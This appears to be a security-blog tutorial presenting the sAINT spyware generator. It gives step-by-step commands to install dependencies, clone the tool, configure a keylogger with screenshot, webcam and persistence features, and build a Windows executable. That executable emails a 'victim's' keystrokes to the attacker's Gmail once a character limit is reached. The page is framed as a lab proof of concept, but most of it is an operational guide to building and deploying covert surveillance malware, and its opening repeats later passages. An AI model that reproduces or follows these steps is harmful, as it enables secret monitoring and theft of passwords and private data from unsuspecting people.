SAINT A Powerful Windows Spyware Generator | Lucideus Research
Introduction
(s)AINT is a Linux based Spyware Generator for Windows system written in Java.
sAINT provide following features:
Proof of Concept
Step 1: First of all we need to install dependencies (Maven and JDK 8 package)
$ git clone https://github.com/tiagorlampert/sAINT.git
$ cd sAINT
Press enter to continue
Enter your GMAIL id: [youremailid]
Enter your Password: xxxxxxxxxxxxxxxx
Enable Screenshot (Y/n): Y
Enable Webcam (Y/n): Y
Enable Persistence (Y/n): Y
Enter the number of character to send E-mail: 10
Note: You must have to allow access to less secure apps on your gmail account
Follow the link : https://www.google.com/settings/security/lesssecureapps
And then make the button go blue of Allow less secure apps: OFF → ON
We will start receiving the email. Since, we had set the character limit to 10 we will receive a email in our inbox soon after the victim will press key strokes.
Character limit can be set according for our need.
Reference:
https://github.com/tiagorlampert/sAINT
(s)AINT is a Linux based Spyware Generator for Windows system written in Java.
sAINT provide following features:
- Keyloggers
- Take Screenshots
- Webcam Capture
- Persistence
Lab Environment
- Target Machine: Windows 7 Professional x64bit
- Java JRE 8 on windows is required
Proof of Concept
Step 1: First of all we need to install dependencies (Maven and JDK 8 package)
Open terminal and write
$ apt install maven default-jdk default-jre openjdk-8-jdk openjdk-8-jre –y
$ apt install zlib1g-dev libncurses5-dev lib32z1 lib32ncurses5 –y
Step 2: Clone this repository
$ git clone https://github.com/tiagorlampert/sAINT.git
Step 3: Navigate to sAINT directory
$ cd sAINT
$ ls
Step 4: Provide executable permissions
$ chmod +x configure.sh
$ ls
$ ./configure.sh
Step 5: Run sAINT.jar
$ java -jar sAINT.jar
Press enter to continue
Enter your GMAIL id: [youremailid]
Enter your Password: xxxxxxxxxxxxxxxx
Enable Screenshot (Y/n): Y
Enable Webcam (Y/n): Y
Enable Persistence (Y/n): Y
Enter the number of character to send E-mail: 10
The information above is correct? (y/n): Y
You would like to generate .EXE using lauch4j? (y/n): Y
The generated .exe can be found in target/ folder
Note: You must have to allow access to less secure apps on your gmail account
Follow the link : https://www.google.com/settings/security/lesssecureapps
And then make the button go blue of Allow less secure apps: OFF → ON
Step 6: Now move to target machine
- Deploy both file which we had found inside target folder of sAINT directory
- Install Java Jre 8 or the rolling version in our target machine. It’s essential for our spyware to work
Why does the .EXE need java on target machine to run?
The JRE is required and the executable will not work without it. Because the Windows need JRE for translating the program from java byte code to machine language.
- Our target machine is ready to run our spyware.
- Double click .jar file and our job is done. It’s a self extracting jar file
We will start receiving the email. Since, we had set the character limit to 10 we will receive a email in our inbox soon after the victim will press key strokes.
Character limit can be set according for our need.
https://github.com/tiagorlampert/sAINT
